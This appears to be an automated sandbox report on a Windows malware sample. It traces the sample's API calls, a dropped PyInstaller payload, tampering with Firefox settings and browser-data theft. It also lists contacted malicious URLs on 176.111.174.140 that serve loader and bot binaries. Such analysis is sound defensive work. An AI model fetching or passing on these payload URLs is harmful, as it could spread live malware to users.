Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	7_2_00007FF736B684B4
Source: C:\Windows\System32\svchost.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	7_2_00007FF736B6406C
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesEx,	7_2_00007FF736B66430
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	7_2_00007FF736B69830
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	7_2_00007FF736B6920C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	7_2_00007FF736B67D2C
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	7_2_00007FF736B5BEB4
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	7_2_00007FF736B69678
Source: C:\Windows\System32\svchost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_00007FF736B6AE34
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: EnumSystemLocalesW,	11_2_00007FFE0133F35C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	11_2_00007FFE0133F3C4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,	11_2_00007FFE0133D2E0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	11_2_00007FFE0133F478
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_00007FFE0133F8C0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetProcAddress,GetLocaleInfoW,	11_2_00007FFE012EDC20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00007FFE0133FA48
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	13_2_00007FF7F4E8920C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	13_2_00007FF7F4E87D2C
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	13_2_00007FF7F4E7BEB4
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	13_2_00007FF7F4E89678
Source: C:\Windows\System32\svchost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	13_2_00007FF7F4E8AE34
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	13_2_00007FF7F4E877A0
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,	13_2_00007FF7F4E8972C
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	13_2_00007FF7F4E8ACD8
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	13_2_00007FF7F4E884B4
Source: C:\Windows\System32\svchost.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	13_2_00007FF7F4E8406C
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	13_2_00007FF7F4E89830
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesEx,	13_2_00007FF7F4E86430

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-console-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-2-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop\MXPXCVPDVN VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E171545C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,

0_2_00007FF6E171545C

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC074B0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Code function: 8_2_00007FF632DC518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

8_2_00007FF632DC518C

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC074B0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Overwrites Mozilla Firefox settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior

AV process strings found (often used to terminate AV products)

Source: svchost.exe

Binary or memory string: procexp.exe

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Source: C:\Windows\System32\svchost.exe

File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js

Remote Access Functionality

Multi AV Scanner detection for dropped file

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.111.174.140	unknown	Russian Federation		201305	WILWAWPL	true

Contacted URLs

Name	Malicious	Reputation
http://176.111.174.140/api/loader.bin	true	unknown
http://176.111.174.140/zx.exe	true	unknown
http://176.111.174.140/GrXRYWt.php?8711E746C94A2518020777	true	unknown
http://176.111.174.140/api/bot64.bin	true	unknown

AV Detection

Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe

ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: fNzx1wx8tL.exe

ReversingLabs: Detection: 69%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: fNzx1wx8tL.exe

Joe Sandbox ML: detected

Source: fNzx1wx8tL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907622064.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908284382.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901212652.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr
Source:	Binary string: ucrtbase.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1935038429.00007FFE01385000.00000002.00000001.01000000.0000000A.sdmp
